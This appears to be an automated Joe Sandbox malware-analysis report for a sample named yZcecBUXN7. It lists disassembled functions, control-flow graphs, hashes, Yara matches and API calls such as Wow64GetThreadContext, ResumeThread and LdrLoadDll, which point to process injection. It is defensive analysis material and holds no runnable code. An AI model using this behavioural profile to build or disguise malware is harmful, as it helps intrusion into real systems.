                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00CCB878 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 92 ccb878-ccb8d4 93 ccb8eb-ccb932 Wow64GetThreadContext 92->93 94 ccb8d6-ccb8e8 92->94 95 ccb93b-ccb973 93->95 96 ccb934-ccb93a 93->96 94->93 96->95
                                                                                                      APIs
                                                                                                      • Wow64GetThreadContext.KERNEL32(?,?), ref: 00CCB922
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ContextThreadWow64
                                                                                                      • String ID:
                                                                                                      • API String ID: 983334009-0
                                                                                                      • Opcode ID: 5e36c41487fbd7e9f3f5e0343be5ad7d4262e17a042041ea6de7a2a07bffa385
                                                                                                      • Instruction ID: d528f164df3edebd0de586bf0055c5d71242c801f4abdd421e36d4db93cb2dae
                                                                                                      • Opcode Fuzzy Hash: 5e36c41487fbd7e9f3f5e0343be5ad7d4262e17a042041ea6de7a2a07bffa385
                                                                                                      • Instruction Fuzzy Hash: D2319AB5D012589FCB10CFAAD584ADEFBF1BB49314F24902AE418B7250D378AA45CF64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00CCA878 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 99 cca878-cca906 ResumeThread 102 cca90f-cca951 99->102 103 cca908-cca90e 99->103 103->102
                                                                                                      APIs
                                                                                                      • ResumeThread.KERNELBASE(?), ref: 00CCA8F6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ResumeThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 947044025-0
                                                                                                      • Opcode ID: eb1ddca9abfcdbccdcedac654a3dabdea9479d5f0d17eb8aefb881e8031a3149
                                                                                                      • Instruction ID: db926c7d17c1086e2dd6d84c226b8b2d1b9a8c8c0b72c76099c371c9b842a4c3
                                                                                                      • Opcode Fuzzy Hash: eb1ddca9abfcdbccdcedac654a3dabdea9479d5f0d17eb8aefb881e8031a3149
                                                                                                      • Instruction Fuzzy Hash: 3631CAB4D012189FCB10CFAAD985ADEFBF4AB49324F10942AE815B7310C735A941CF98
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C1D4CC Relevance: .1, Instructions: 75COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 182 c1d4cc-c1d4de 183 c1d572-c1d579 182->183 184 c1d4e4 182->184 185 c1d4e6-c1d4f2 183->185 184->185 186 c1d4f8-c1d51a 185->186 187 c1d57e-c1d583 185->187 189 c1d588-c1d59d 186->189 190 c1d51c-c1d53a 186->190 187->186 194 c1d554-c1d55c 189->194 192 c1d542-c1d552 190->192 192->194 195 c1d5aa 192->195 196 c1d59f-c1d5a8 194->196 197 c1d55e-c1d56f 194->197 196->197
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626157109.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_c1d000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 686b1430ec6a11f4fccae35e1837bbd1a27679ca0843163e1e8828ffa40784c0
                                                                                                      • Instruction ID: 100af5a1e82c056960864ab95543ee4491d61d7b53c9d5e7a601d14783a5d04e
                                                                                                      • Opcode Fuzzy Hash: 686b1430ec6a11f4fccae35e1837bbd1a27679ca0843163e1e8828ffa40784c0
                                                                                                      • Instruction Fuzzy Hash: 212149B1504200DFDB05DF14D9C0B67BF66FB99318F30C569E90A0B256C33AD996EBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00C1D4C7 Relevance: .1, Instructions: 56COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626157109.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_c1d000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                      • Instruction ID: 17d17a5cd5ff27067f93da6bdfa285bb326559964eba69056a429b6813d20807
                                                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                      • Instruction Fuzzy Hash: 1911E6B6504240CFCB06CF10D5C4B56BF72FB95314F24C6A9DC0A0B256C33AD99ADBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      Function 00CC30D0 Relevance: .3, Instructions: 255COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1626319190.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_cc0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 879e68bf1ddad6efa2c20cf0d2cc6de956e6a20c1d7f6da65c06049d8efad7b2
                                                                                                      • Instruction ID: 6bb5d331657da7898590dbcd795ed20d4c8364265af31bc990a12b8300e8e449
                                                                                                      • Opcode Fuzzy Hash: 879e68bf1ddad6efa2c20cf0d2cc6de956e6a20c1d7f6da65c06049d8efad7b2
                                                                                                      • Instruction Fuzzy Hash: CE51D383DC4D95ABDF0008BBFC917E5A780C23723DF96D349D2B84A6D66584068793A6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:1.2%
                                                                                                      Dynamic/Decrypted Code Coverage:4.7%
                                                                                                      Signature Coverage:8.7%
                                                                                                      Total number of Nodes:150
                                                                                                      Total number of Limit Nodes:16
                                                                                                      execution_graph 93824 424043 93828 424052 93824->93828 93825 424099 93832 42cdf3 93825->93832 93828->93825 93829 4240da 93828->93829 93831 4240df 93828->93831 93830 42cdf3 RtlFreeHeap 93829->93830 93830->93831 93835 42b243 93832->93835 93834 4240a9 93836 42b25d 93835->93836 93837 42b26e RtlFreeHeap 93836->93837 93837->93834 93838 42a4e3 93839 42a500 93838->93839 93842 1142df0 LdrInitializeThunk 93839->93842 93840 42a528 93842->93840 93863 42ded3 93864 42dee3 93863->93864 93865 42dee9 93863->93865 93868 42ced3 93865->93868 93867 42df0f 93871 42b1f3 93868->93871 93870 42ceee 93870->93867 93872 42b210 93871->93872 93873 42b221 RtlAllocateHeap 93872->93873 93873->93870 93874 423cb3 93875 423ccf 93874->93875 93876 423cf7 93875->93876 93877 423d0b 93875->93877 93878 42aed3 NtClose 93876->93878 93879 42aed3 NtClose 93877->93879 93880 423d00 93878->93880 93881 423d14 93879->93881 93884 42cf13 RtlAllocateHeap 93881->93884 93883 423d1f 93884->93883 93843 4138c3 93844 4138dd 93843->93844 93849 4172c3 93844->93849 93846 4138fb 93847 413940 93846->93847 93848 41392f PostThreadMessageW 93846->93848 93848->93847 93850 4172e7 93849->93850 93851 4172ee 93850->93851 93853 41730d 93850->93853 93856 42e2b3 LdrLoadDll 93850->93856 93851->93846 93854 417323 LdrLoadDll 93853->93854 93855 41733a 93853->93855 93854->93855 93855->93846 93856->93853 93885 41da53 93887 41da79 93885->93887 93886 41db70 93887->93886 93894 42e003 93887->93894 93889 41db0b 93889->93886 93890 41db67 93889->93890 93905 42a533 93889->93905 93890->93886 93900 4275e3 93890->93900 93893 41dc1d 93895 42df73 93894->93895 93896 42ced3 RtlAllocateHeap 93895->93896 93897 42dfd0 93895->93897 93898 42dfad 93896->93898 93897->93889 93899 42cdf3 RtlFreeHeap 93898->93899 93899->93897 93901 427640 93900->93901 93902 42767b 93901->93902 93909 4182c3 93901->93909 93902->93893 93904 42765d 93904->93893 93906 42a550 93905->93906 93917 1142c0a 93906->93917 93907 42a57c 93907->93890 93911 418263 93909->93911 93910 4182fd 93911->93910 93914 42b293 93911->93914 93913 4182ab 93913->93904 93915 42b2ad 93914->93915 93916 42b2be ExitProcess 93915->93916 93916->93913 93918 1142c11 93917->93918 93919 1142c1f LdrInitializeThunk 93917->93919 93918->93907 93919->93907 93920 41a933 93921 41a977 93920->93921 93922 41a998 93921->93922 93923 42aed3 NtClose 93921->93923 93923->93922 93924 1142b60 LdrInitializeThunk 93925 401b75 93926 401b82 93925->93926 93929 42e393 93926->93929 93932 42c9b3 93929->93932 93933 42c9d7 93932->93933 93944 4072b3 93933->93944 93935 42ca00 93943 401c13 93935->93943 93947 41a743 93935->93947 93937 42ca1f 93938 42ca34 93937->93938 93939 42b293 ExitProcess 93937->93939 93958 426f53 93938->93958 93939->93938 93941 42ca43 93942 42b293 ExitProcess 93941->93942 93942->93943 93962 415ff3 93944->93962 93946 4072c0 93946->93935 93948 41a76f 93947->93948 93973 41a633 93948->93973 93951 41a79c 93954 42aed3 NtClose 93951->93954 93955 41a7a7 93951->93955 93952 41a7b4 93953 41a7d0 93952->93953 93956 42aed3 NtClose 93952->93956 93953->93937 93954->93955 93955->93937 93957 41a7c6 93956->93957 93957->93937 93959 426fad 93958->93959 93961 426fba 93959->93961 93984 417e13 93959->93984 93961->93941 93963 41600a 93962->93963 93965 416023 93963->93965 93966 42b923 93963->93966 93965->93946 93968 42b93b 93966->93968 93967 42b95f 93967->93965 93968->93967 93969 42a533 LdrInitializeThunk 93968->93969 93970 42b9b4 93969->93970 93971 42cdf3 RtlFreeHeap 93970->93971 93972 42b9cd 93971->93972 93972->93965 93974 41a64d 93973->93974 93978 41a729 93973->93978 93979 42a5d3 93974->93979 93977 42aed3 NtClose 93977->93978 93978->93951 93978->93952 93980 42a5f0 93979->93980 93983 11435c0 LdrInitializeThunk 93980->93983 93981 41a71d 93981->93977 93983->93981 93986 417e3d 93984->93986 93985 4182ab 93985->93961 93986->93985 93992 4139f3 93986->93992 93988 417f4a 93988->93985 93989 42cdf3 RtlFreeHeap 93988->93989 93990 417f62 93989->93990 93990->93985 93991 42b293 ExitProcess 93990->93991 93991->93985 93994 413a12 93992->93994 93993 413b67 93993->93988 93994->93993 94000 413b30 93994->94000 94001 413443 93994->94001 93996 413b44 93996->93993 94006 41aa53 RtlFreeHeap LdrInitializeThunk 93996->94006 93998 413b5d 93998->93988 94000->93993 94005 41aa53 RtlFreeHeap LdrInitializeThunk 94000->94005 94002 41345f 94001->94002 94007 42b153 94002->94007 94005->93996 94006->93998 94008 42b170 94007->94008 94011 1142c70 LdrInitializeThunk 94008->94011 94009 413465 94009->94000 94011->94009 93857 4184c8 93860 42aed3 93857->93860 93859 4184d2 93861 42aef0 93860->93861 93862 42af01 NtClose 93861->93862 93862->93859

                                                                                                      Executed Functions

                                                                                                      Function 004172C3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 185 4172c3-4172ec call 42daf3 188 4172f2-417300 call 42e013 185->188 189 4172ee-4172f1 185->189 192 417310-417321 call 42c483 188->192 193 417302-41730d call 42e2b3 188->193 199 417323-417337 LdrLoadDll 192->199 200 41733a-41733d 192->200 193->192 199->200
                                                                                                      APIs
                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417335
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Load
                                                                                                      • String ID:
                                                                                                      • API String ID: 2234796835-0
                                                                                                      • Opcode ID: 6fba1dc22c45e035d7cfd6925315d8c7f623b9e23ecf1f98383965f4673800c9
                                                                                                      • Instruction ID: be12655ba759db9e0842be656872b8ab626e7f57d8359b2776f7ad09e683dc73
                                                                                                      • Opcode Fuzzy Hash: 6fba1dc22c45e035d7cfd6925315d8c7f623b9e23ecf1f98383965f4673800c9
                                                                                                      • Instruction Fuzzy Hash: AD015EB1E0020DABDF10DAE5DD42FDEB3B8AB14308F00419AED0897240F675EB458B95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0042AED3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 213 42aed3-42af0f call 404a83 call 42bf83 NtClose
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID:
                                                                                                      • API String ID: 3535843008-0
                                                                                                      • Opcode ID: df1470d35645786788c12b704a489055868d3b7b6fb03ba64aaf800453adc970
                                                                                                      • Instruction ID: 688dba45891aa492f683e5c8dc72cab05f99d544db877472c52698b64936e208
                                                                                                      • Opcode Fuzzy Hash: df1470d35645786788c12b704a489055868d3b7b6fb03ba64aaf800453adc970
                                                                                                      • Instruction Fuzzy Hash: 6BE04F313402147BD510EB5ADC42FD7B75CDFC5B24F004019FA08A7142C6B1B91187F4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 227 1142b60-1142b6c LdrInitializeThunk
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: a90c2b1da3a24100a86a9835afa027171611ddc174f0a61628c0e0b864a7baf4
                                                                                                      • Instruction ID: 24c54b08d534af1a448593e9c19fc1330cb911b1899edcd7107a9966507bce0f
                                                                                                      • Opcode Fuzzy Hash: a90c2b1da3a24100a86a9835afa027171611ddc174f0a61628c0e0b864a7baf4
                                                                                                      • Instruction Fuzzy Hash: B690026120240043424971598514616400A97E0201B55C021F5115590DC62589916625
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 3b1c48adf025244af7bc636abfddebca4b121fac4d8d8fad738348bce1348cb5
                                                                                                      • Instruction ID: e8523e5f539f76d97e6074d5a3e98f1b02a3e4efa5dbe39e5cf5af5196f756f2
                                                                                                      • Opcode Fuzzy Hash: 3b1c48adf025244af7bc636abfddebca4b121fac4d8d8fad738348bce1348cb5
                                                                                                      • Instruction Fuzzy Hash: B290023120140453D25571598604707000997D0241F95C412B4525558DD7568A52A621
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01142C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 228 1142c70-1142c7c LdrInitializeThunk
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 4acbf673a99cf0cb73d2cb224781aab4a0c1cde6cc9a44e086f3f592bdc2dd3e
                                                                                                      • Instruction ID: 3bc3e2892cb4fc14f3fb96c7f22e7f9f92baf7275aae44581ea1ff5ad72ae39a
                                                                                                      • Opcode Fuzzy Hash: 4acbf673a99cf0cb73d2cb224781aab4a0c1cde6cc9a44e086f3f592bdc2dd3e
                                                                                                      • Instruction Fuzzy Hash: E490023120148842D2547159C50474A000597D0301F59C411B8525658DC79589917621
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 011435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_10d0000_yZcecBUXN7.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: cbfdf6cad0dca05251499e114acad9e979c719ef36b0f4eda97f0819788579aa
                                                                                                      • Instruction ID: 3ca4f1105e5f8c84f35f36511cc64975d0b04f166e50e3c8b1360365d02ffd98
                                                                                                      • Opcode Fuzzy Hash: cbfdf6cad0dca05251499e114acad9e979c719ef36b0f4eda97f0819788579aa
                                                                                                      • Instruction Fuzzy Hash: FF90023160550442D24471598614706100597D0201F65C411B4525568DC7958A516AA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00413883 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88threadwindowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(1-00F23L,00000111,00000000,00000000), ref: 0041393A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 1-00F23L$1-00F23L
                                                                                                      • API String ID: 1836367815-1360091209
                                                                                                      • Opcode ID: 4e3f3cdf01874b8e653f28d3aa68fbcb1fa7f1bbc9d5dd1ced0f5bf2568d3b3f
                                                                                                      • Instruction ID: dad3f1bf3461ee6743ac2613c6a1a15b35489b91ab018fdad6f73098214db0fa
                                                                                                      • Opcode Fuzzy Hash: 4e3f3cdf01874b8e653f28d3aa68fbcb1fa7f1bbc9d5dd1ced0f5bf2568d3b3f
                                                                                                      • Instruction Fuzzy Hash: C3213BB2E0515D7EDB109AE5DC81CEFBF7CEB817A4F044169FA04A7201D62D4E468BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004138BB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 18 4138bb-4138d5 21 4138dd-41392d call 42d8a3 call 4172c3 call 4049f3 call 424153 18->21 22 4138d8 call 42ce93 18->22 31 41394d-413953 21->31 32 41392f-41393e PostThreadMessageW 21->32 22->21 32->31 33 413940-41394a 32->33 33->31
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(1-00F23L,00000111,00000000,00000000), ref: 0041393A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 1-00F23L$1-00F23L
                                                                                                      • API String ID: 1836367815-1360091209
                                                                                                      • Opcode ID: 269268a35bc773475876693d8e8c3953469ca095ce7f5abf29454d4a764a62b1
                                                                                                      • Instruction ID: bf72f905077f62352338d02f57188b15978831edf82210be98aaa5911d9822eb
                                                                                                      • Opcode Fuzzy Hash: 269268a35bc773475876693d8e8c3953469ca095ce7f5abf29454d4a764a62b1
                                                                                                      • Instruction Fuzzy Hash: 0311E5B1D0111C7AEB109AD1DC81DEF7B7CEF856A4F058069FA14A7141D67C4E068BB5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004138C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(1-00F23L,00000111,00000000,00000000), ref: 0041393A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID: 1-00F23L$1-00F23L
                                                                                                      • API String ID: 1836367815-1360091209
                                                                                                      • Opcode ID: 391d386943b1808283143c9a9e3f9eae877c47038242643741c695a8a34056d7
                                                                                                      • Instruction ID: 50a8418c5eb84047c980e4203ae497f2a96d7eff4e8ece36fc3dd072fc9062e8
                                                                                                      • Opcode Fuzzy Hash: 391d386943b1808283143c9a9e3f9eae877c47038242643741c695a8a34056d7
                                                                                                      • Instruction Fuzzy Hash: E501D6B6D0121C7ADB10AAE19C82DEF7B7CEF41794F058069FA14A7241D67C4F068BB5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0042B243 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 57 42b243-42b284 call 404a83 call 42bf83 RtlFreeHeap
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B27F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeHeap
                                                                                                      • String ID: t`A
                                                                                                      • API String ID: 3298025750-3365864255
                                                                                                      • Opcode ID: fbcf6ccdff16819e7b9671a13f7bb19d08f365755ebbb67c803cee3a70a51c4e
                                                                                                      • Instruction ID: df9116eedf2735d403eac2a96813b18013c981de2a31dc5022da1d101f35b3e3
                                                                                                      • Opcode Fuzzy Hash: fbcf6ccdff16819e7b9671a13f7bb19d08f365755ebbb67c803cee3a70a51c4e
                                                                                                      • Instruction Fuzzy Hash: B0E06DB22042147BD610EE59DC41F9B73ACDFC8714F004019FA08A7242DA70B9118BB8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00417343 Relevance: 1.5, APIs: 1, Instructions: 32libraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 201 417343-417356 202 417314-417321 call 42c483 201->202 203 417358-41735a 201->203 206 417323-417337 LdrLoadDll 202->206 207 41733a-41733d 202->207 206->207
                                                                                                      APIs
                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417335
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Load
                                                                                                      • String ID:
                                                                                                      • API String ID: 2234796835-0
                                                                                                      • Opcode ID: 7bd9caf30479e62fb632866713461e7b705ac9bb8eb7a46f4573d7889417fe59
                                                                                                      • Instruction ID: 316f26f4d3cbf0379d92b9302858d7169f8dd742bb4dc9dd1a2b7698a80ce277
                                                                                                      • Opcode Fuzzy Hash: 7bd9caf30479e62fb632866713461e7b705ac9bb8eb7a46f4573d7889417fe59
                                                                                                      • Instruction Fuzzy Hash: E6E0307590010D7BDA10DAA5DC41FDEB7789B44608F108195FD1897241E630AA4AC791
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0042B1F3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 208 42b1f3-42b237 call 404a83 call 42bf83 RtlAllocateHeap
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,0041DB0B,?,?,00000000,?,0041DB0B,?,?,?), ref: 0042B232
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_yZcecBUXN7.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 8a26d1f61ef8d8523c3f67aeb38332fdff2056bb52c038478534f2080464a389
                                                                                                      • Instruction ID: 7b406fbdc20ba51e71dd5df2a1ba29081d896773eb138d5b23efded7d8508b84
                                                                                                      • Opcode Fuzzy Hash: 8a26d1f61ef8d8523c3f67aeb38332fdff2056bb52c038478534f2080464a389
                                                                                                      • Instruction Fuzzy Hash: DDE06D712002047BD610EE99EC41F9B73ACEFC9710F404019F908A7242D670B9108BB8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0042B293 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 218 42b293-42b2cc call 404a83 call 42bf83 ExitProcess
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(?,00000000,?,?,3689612B,?,?,3689612B), ref: 0042B2C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
